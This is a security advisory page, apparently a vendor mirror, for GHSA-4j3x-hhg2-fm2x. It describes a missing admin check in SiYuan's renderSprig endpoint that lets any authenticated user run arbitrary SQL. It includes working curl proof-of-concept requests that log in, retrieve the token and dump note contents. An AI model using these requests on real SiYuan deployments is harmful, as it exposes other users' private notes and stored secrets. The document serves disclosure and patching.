GHSA-4j3x-hhg2-fm2x
MEDIUMSiYuan's renderSprig has a missing admin check that allows any user to read full workspace DB
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/siyuan-note/siyuan/kernelReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.
Details
File: kernel/api/router.go
Every sensitive endpoint in the codebase uses model.CheckAuth + model.CheckAdminRole, but renderSprig only has CheckAuth:
// Missing CheckAdminRole
ginServer.Handle("POST", "/api/template/renderSprig",
model.CheckAuth, renderSprig)
// Correct pattern used by all other data endpoints
ginServer.Handle("POST", "/api/template/render",
model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)
renderSprig calls model.RenderGoTemplate (kernel/model/template.go) which registers SQL functions from kernel/sql/database.go:
(*templateFuncMap)["querySQL"] = func(stmt string) (ret []map[string]interface{}) {
ret, _ = Query(stmt, 1024) // executes raw SELECT, no role check
return
}
Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Exploit:
# Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
-H "Content-Type: application/json" \
-d '{"authCode":"test123"}' -c /tmp/siy.cookie
sleep 15 # wait for boot
TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
-b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")
# Step 2: Execute SQL as non-admin user
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'
Confirmed response on v3.6.0:
{"code":0,"msg":"","data":"[{\"n\":0}]"}
Full note dump:
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'
Impact
Any authenticated user (API token holder, Publish Service Reader) can:
- Dump all note content and document hierarchy from the workspace
- Exfiltrate tags, custom attributes, block IDs, and timestamps
- Search notes for stored passwords, API keys, or personal data
- Enumerate all notebooks and their structure
This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/siyuan-note/siyuan/kernel | all versions | 3.6.1 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/siyuan-note/siyuan/kernel. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/siyuan-note/siyuan/kernel to 3.6.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4j3x-hhg2-fm2x is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4j3x-hhg2-fm2x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4j3x-hhg2-fm2x. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4j3x-hhg2-fm2x in your dependencies?
O3 detects GHSA-4j3x-hhg2-fm2x across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.